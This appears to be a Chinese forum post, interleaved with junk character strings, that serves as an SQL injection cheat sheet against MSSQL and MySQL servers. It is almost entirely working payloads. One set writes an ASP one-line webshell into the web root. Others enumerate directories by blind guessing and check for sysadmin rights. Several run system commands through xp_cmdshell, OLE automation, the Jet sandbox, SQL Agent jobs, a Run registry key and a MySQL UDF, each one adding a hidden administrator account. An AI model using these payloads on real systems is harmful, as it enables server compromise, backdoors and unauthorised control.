MSSQL语句导出一句话木马
9 u& ?/ P# [6 d+ P2 P% Q首先确定网站的WEB路径
% m, S: P( L; Y1 c7 V0 y. |) M;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马
3 y- V- n7 `! N0 i
2 G: O8 I. K- f% V3 j;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- & } W3 v. s! ]% j1 p% m! D
//将一句话木马插入表中
- M7 s& v" ]8 [+ ] A7 N9 r" {& v7 s7 U# G
;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--
! p, }% ~% Q6 u/ c e//导出一个ASP文件
" L- ?0 {4 E/ K+ h5 `
/ |' `% j4 ~5 O1 t% v% u( U$ l1 j
7 T5 K2 M* Z7 N% f a' ^关于MSSQL列目录: K; `& |0 T! L
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表- m6 w. a5 Q2 K
Insert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
% @+ P; [% I+ k p$ i. W6 I
z% o# l# F) q0 nand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录; T$ S7 g0 M6 B6 v( ]" h
: U% [8 A7 v4 Z, \( L6 ?( l: w
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
% G0 C% q% k6 J3 Q2 S' p! V% y/ ~" c! W, N# q! q% r* Z% [1 x
And (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符. L, c% H/ |( Y- `! w6 g
$ @$ B) h o0 N9 c9 I2 y, j9 S' [
6 Z7 n p1 r9 \4 A4 U- a9 i0 Q
数据库版本和权限查看
% `% Z2 h- k3 H# v4 Tand 1=(select @@VERSION) //查看详细的数据库信息.
' u; Z) y- M" t; ^; A3 b; nand 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA
! C* J+ w* Y1 O; g- k8 x) l4 Vand 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
G6 e$ Z/ m8 Q5 \4 b2 s0 i# n- M* Z3 i3 x
/ O. \% T4 s5 y9 @8 k
1.利用xp_cmdshell执行命令2 {& t( \1 d6 G- N$ L
exec master..xp_cmdshell 'net user rfire 123456 /add'
" i/ M( p' s0 q- Oexec master..xp_cmdshell 'net localgroup administrators rfire /add'
5 V& g1 |) v) {5 ?, ?1 M
$ k7 g2 }: ]# G1 {$ I9 y! q/ @; X恢复xp_cmdshell存储过程' o3 Y$ L- {) T. ]2 A5 M& r# |
Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
! J. \/ p* A/ k" f4 b
7 }; d' ?4 k- I" S
' H6 @6 F- [6 X1 T2.利用SP_OAcreate和SP_OAMETHOD执行命令- J: Y0 \5 y0 _/ k6 _
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下6 o' B; A8 G$ j9 X5 V' \* @
DECLARE @shell INT //建立一个@shell实体4 d x" O4 ~' N2 H9 G
EXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例
* V* i6 V$ x( q' n6 O qEXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例* b" |# j( U h* o
4 Y3 ~& |1 u8 ^3 g; M
( l# r" E3 p7 o, s" g3.利用沙盒模式
" l5 V# j% m& r1 n- r$ _先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
7 Y1 h' G4 c3 l6 H, o6 ]% N, P开启沙盒模式:& X" i8 V/ @+ W+ E
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0* d4 s- @* E1 X: P
& E7 w8 {2 m: S7 F! H$ ~执行命令:- \ d1 T/ ?# X4 Z& A
Select * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
! ~ Q# U+ K& h* l: R! c8 b0 {- `% l) Q3 H1 G
+ w, ~3 u5 |$ P. I( i* Z: ~
4.利用SQL代理执行命令
; W% @, [8 E; O' MEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
' R1 b; c( M$ V$ y+ N, W1 w: A1 I! W! W( |5 {7 ` r- h
执行命令:# ~7 a- J5 P) L1 V# w- U
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错/ H1 y& E/ {& h# J5 g: I) h: l4 k
exec sp_add_job 'x'
- W4 \, q4 A3 |exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业0 b7 c$ c' t3 l) C
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业, |: G* o7 t* I
1 b4 N4 X- I, I9 U( k: T& Q6 V* Y. c4 S }) }! }4 `
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)) r8 A: d7 l+ i' R
EXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'
' v. J2 [; t4 U2 E( ?, D0 I/ E5 \9 s
$ ?5 q+ g7 e# J8 X! U! r2 ~
/ J7 L, B# p; Y. [6 U9 Q9 X6.MYSQL的命令执行
- W6 H: n( o. P/ k: c! GMYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)5 Z6 C3 O+ v5 W b5 m1 T& Y' ?6 k& L
首先要在su.php下导出c:\windows\udf.dll; v3 ^( _# K$ b! g# I T# Y
导出后执行创建自定义函数命令:
, g4 e" s0 J* R$ {$ o' f! Y! QCreate Function cmdshell returns string soname 'udf.dll'
0 R/ D" |2 v/ L3 R! I X# J% a执行命令6 ~3 Y! C1 i( G5 V1 L& G7 _
select cmdshell('net user rfire 123456 /add')# d6 m, v; ~0 N: i+ Y0 d) c
执行后删除函数 drop function cmdshell! ?; ?( j/ G' d4 n: s$ F
|